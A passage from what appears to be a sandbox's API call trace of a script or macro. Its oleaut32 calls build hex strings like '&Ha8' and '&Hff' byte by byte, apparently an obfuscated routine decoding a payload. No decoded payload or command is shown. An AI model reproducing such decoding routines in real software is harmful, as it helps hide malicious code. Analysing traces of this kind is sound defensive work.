out: pbstrResult=0x197ab8) returned 0x0 [0114.935] VarBstrCat (in: bstrLeft="&Ha", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.935] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.935] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.935] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.935] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.935] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.935] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.935] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.935] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.936] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.936] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.936] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.936] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.936] VarBstrCat (in: bstrLeft="&Ha", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.936] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.936] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.936] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.936] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.936] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.936] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.936] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.936] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.937] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.937] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.937] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.937] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.937] VarBstrCat (in: bstrLeft="&Ha", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.937] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.937] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.937] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.937] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.937] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.937] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.937] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.937] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.937] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.938] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.938] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.938] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.938] VarBstrCat (in: bstrLeft="&Ha", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.938] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.938] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.938] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.938] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.938] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.938] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.938] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.938] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.938] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.938] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.938] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.939] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.939] VarBstrCat (in: bstrLeft="&Ha", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.939] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.939] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.939] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.939] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.939] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.939] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.939] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.939] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.939] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.939] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.939] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.939] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.940] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.940] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.940] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.940] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.940] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.940] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.940] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.940] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.940] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.940] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.940] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.940] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.940] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.940] VarBstrCat (in: bstrLeft="&Hb", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.941] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.941] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.941] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.941] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.941] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.941] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.941] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.942] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.942] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.942] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.942] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.942] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.942] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.942] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.942] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.942] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.942] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.942] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.942] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.942] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.942] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.942] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.942] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.943] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.943] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.943] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.943] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.943] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.943] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.943] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.943] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.943] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.943] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.943] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.943] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.943] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.943] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.943] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.943] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.944] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.944] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.944] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.944] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.944] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.944] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.945] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.945] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.945] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.945] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.945] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.945] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.945] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.945] VarBstrCat (in: bstrLeft="&H3", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.945] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.945] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.945] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.945] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.945] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.945] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.945] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.945] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.945] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.946] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.946] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.946] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.946] VarBstrCat (in: bstrLeft="&H7", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.946] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.946] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.946] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.946] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.946] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.946] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.946] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.946] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.946] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.946] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.946] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.947] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.947] VarBstrCat (in: bstrLeft="&H8", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.947] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.947] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.947] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.947] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.947] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.947] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.947] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.947] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.947] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.947] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.947] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.947] VarBstrCat (in: bstrLeft="&Hf", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.947] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.947] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.947] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.948] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.948] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.948] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.948] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.948] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.949] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.949] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.949] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.949] VarBstrCat (in: bstrLeft="&H0", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.949] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.949] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.949] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.949] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.949] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.949] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.949] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.949] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.950] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.950] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.950] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.950] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.950] VarCmp 